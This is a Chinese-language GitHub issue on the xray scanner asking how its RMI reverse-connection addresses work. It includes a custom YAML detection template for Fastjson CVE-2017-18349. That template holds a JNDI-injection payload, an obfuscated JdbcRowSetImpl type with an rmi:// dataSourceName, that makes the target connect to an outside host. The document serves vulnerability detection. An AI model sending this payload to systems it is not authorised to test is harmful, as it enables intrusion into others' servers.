### ISSUE TITLE
关于反连平台rmi的一些疑问

### ISSUE THREAD

**Issue by intbjw** [chaitin/xray#1365]
在测试自定义fastjson-poc的时候，发现官方文档没有过多的介绍反连平台中的rmi协议，也没有说rmi的地址怎么获取，rmi的地址会自定改变吗？我目前的情况是特定的地址，漏洞的判断条件中能不能加上rmi的响应字段信息，目前我是这样写的
```yaml
  name: poc-yaml-fastjson-cve-2017-18349
  set:
      reverse: newReverse()
      reverseURL: reverse.url
      reverseURLHost: reverse.url.host
  rules:
      - method: POST
        path: "/"
        headers:
            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
            Content-Type: application/json
        body: |
            {
                "b":{
                    "@ty\u0070e": "Lc\x6Fm.sun.r\u006Fwse\u0074.\u004A\x64bcRow\u0053e\x74Impl;",
                    "dataSourceName":"rmi://{{reverseURLHost}}/i/hcSvqI7U/07ade1/vi8b/g8h9/PQ5P8iBh/",
                    "autoCommit":true
                }
            }
        expression: |
          response.status==500
```
其中rmi的地址是从内置POC中提取的
![image](https://user-images.githubusercontent.com/38395031/126145180-f9a1bbcf-068a-4819-85f8-00e8e6a6c07e.png)
poc响应
![image](https://user-images.githubusercontent.com/38395031/126145764-a4134a09-9f0c-4c56-b9bb-e94cc281192f.png)
